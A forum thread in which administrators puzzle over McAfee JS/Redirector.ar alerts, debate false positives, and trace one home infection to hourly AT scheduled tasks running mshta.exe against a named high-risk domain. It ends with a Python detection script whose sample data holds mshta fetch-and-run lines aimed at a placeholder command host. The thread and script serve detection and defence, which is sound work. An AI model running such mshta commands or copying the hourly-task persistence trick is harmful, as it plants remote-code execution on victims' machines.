Reviewing my top threat events I have a large number of JS/redirector.ar alerts. Upon review, I strongly feel these are false positives. Why? Because some of the threat target paths are files from our own websites and, from my knowledge, have no reports of dropping malware on anyone's PC. We have an outbound web proxy as well, which would likely have alerted us to any malicious content or websites. So why do I have so many JS/redirector.ar alerts? How can I stop them from a different network layer vs. on the client endpoint? I have web proxies, which I expect should defend against this attack vector, so why aren't they, or is McAfee filling my log books with false positives... likely the case, so what's the best way to stop the noise without losing security?
An example threat target path is
temporary internet files\content.ie5\adcdf\169comparison.htm
I'm receiving similar alerts. Were you able to find a resolution?
No resolution, after more research I really think 80% of these are false positives.
That's what I feared. Unfortunately I can't find much, if anything, about this alert. Full scans of "infected" machines do not find anything else.
Well...good luck and I hope you find the cause.
Same here... found out that ALL of these alerts were false positives. Depends on redirection parameters of JavaScript on the website. Seems like a "generic" pattern. But unfortunately no way to avoid that... This has to be corrected by McAfee.
This Redirector is also being detected by McAfee on some home PCs. A poster has noted that in his Security History the detection is being made once an hour, consistently.
If this is not a false positive that hourly detection might be significant, but I don't know if this is because the AV software is making an hourly check (seems unlikely) or something is creating the file once an hour.
That detected file has the name "LoginCA<xxxxnn>.htm" which looks like a login screen for some website. The location is in a hidden folder (Network Service\Local Settings\Temporary Internet Files\Content.IE5).
Can posters to this thread check their event logs to see whether there is a similar pattern of detection at fixed intervals?
Hourly detection seems rather suspicious to me. This might be a true infection where malware tries to connect to a command server. Delete temporary internet files first - if detection continues (without surfing on the internet) then do a full scan with AV.
I'm getting these alerts while surfing on different (harmless) sites only.
Message edited by schgu on 10.05.13 15:36:03 MESZ
This is what Microsoft has to say about Trojan JS/Redirector.ar: I'm assuming that McAfee and Microsoft are referring to the same Redirector.
So yes, it's possible the poster in the thread in the Consumer section is seeing the effects of downloaded malware. A Full McAfee scan found nothing, but the hourly quarantining of the file noted above is continuing.
This is correct. The Microsoft Encyclopedia entry has been updated April 2011. This is, in my case, a strong indication for a false positive. Today there are some dozens of newer variations of JS/Redirector in the field. Why should this "old chap" appear so often during the last 4-5 weeks?
In your case it seems to be a different story. Why not try a different scanner to double-check?
For example this one (or similar)
The poster in the Consumer section found a batch of ATnn tasks in Task Scheduler, one per hour of the day. That accounts for McAfee's hourly detection of the Redirector, and also why scans with McAfee and Malwarebytes failed to find anything. Each hourly task created an instance of mshta.exe and tried to connect to global-network-solution.com, a site rated High Risk by TrustedSource (and Red rated by SiteAdvisor, so don't try to go there). The interesting part is why, for a Red site, the connection was allowed, as it must have been.
Still, the relevant information here is Task Scheduler. Perhaps everyone seeing this detection should check their scheduled tasks. And Googling shows that this technique (with the hourly AT.. tasks, and mshta.exe) has been used successfully for years. Simple, but effective.
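A defender-side check for the pattern described in the last two posts (a batch of ATnn scheduled tasks, one per hour, each launching mshta.exe), as an added example that is not from this thread or from McAfee. It parses the CSV that `schtasks /query /fo CSV /v` prints; the sample rows and the placeholder URL are constructed, and the column names `TaskName`, `Task To Run`, `Schedule Type` and `Start Time` are assumed to match that output.

```python
import csv
import io
import re
from collections import defaultdict

# Constructed sample in the shape of `schtasks /query /fo CSV /v` output.
# Only the columns used below are shown; the URL is a placeholder, not a real site.
SAMPLE_CSV = """\
"TaskName","Task To Run","Schedule Type","Start Time"
"\\At1","mshta.exe http://placeholder-c2.example/LoginCA.htm","Daily","01:00:00"
"\\At2","mshta.exe http://placeholder-c2.example/LoginCA.htm","Daily","02:00:00"
"\\At3","mshta.exe http://placeholder-c2.example/LoginCA.htm","Daily","03:00:00"
"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c","Weekly","01:00:00"
"\\GoogleUpdateTaskMachineUA","C:\\Program Files\\Google\\Update\\GoogleUpdate.exe /ua","Daily","12:00:00"
"""

# Script hosts the thread describes being launched by the AT tasks.
SUSPICIOUS_HOSTS = ("mshta.exe",)
# AT.EXE-created jobs are named At1, At2, ... (schtasks prefixes a backslash).
AT_TASK_NAME = re.compile(r"^\\?At\d+$", re.IGNORECASE)


def parse_schtasks_csv(text):
    """Parse verbose schtasks CSV; drop any repeated header rows."""
    rows = csv.DictReader(io.StringIO(text))
    return [r for r in rows if r["TaskName"] != "TaskName"]


def flag_lolbin_tasks(rows):
    """Tasks whose command line invokes one of SUSPICIOUS_HOSTS."""
    return [r for r in rows
            if any(h in r["Task To Run"].lower() for h in SUSPICIOUS_HOSTS)]


def find_at_batches(rows, min_tasks=3):
    """Group ATnn tasks by command and return those that fire at several
    distinct start times: the 'one task per hour of the day' pattern."""
    by_cmd = defaultdict(list)
    for r in rows:
        if AT_TASK_NAME.match(r["TaskName"]):
            by_cmd[r["Task To Run"]].append(r["Start Time"])
    return {cmd: sorted(times) for cmd, times in by_cmd.items()
            if len(set(times)) >= min_tasks}


if __name__ == "__main__":
    tasks = parse_schtasks_csv(SAMPLE_CSV)
    for t in flag_lolbin_tasks(tasks):
        print("script host task:", t["TaskName"], "->", t["Task To Run"])
    for cmd, times in find_at_batches(tasks).items():
        print("AT batch:", cmd, "at", ", ".join(times))
```

On a live host, feed it `subprocess.run(["schtasks", "/query", "/fo", "CSV", "/v"], capture_output=True, text=True).stdout` instead of the constructed sample.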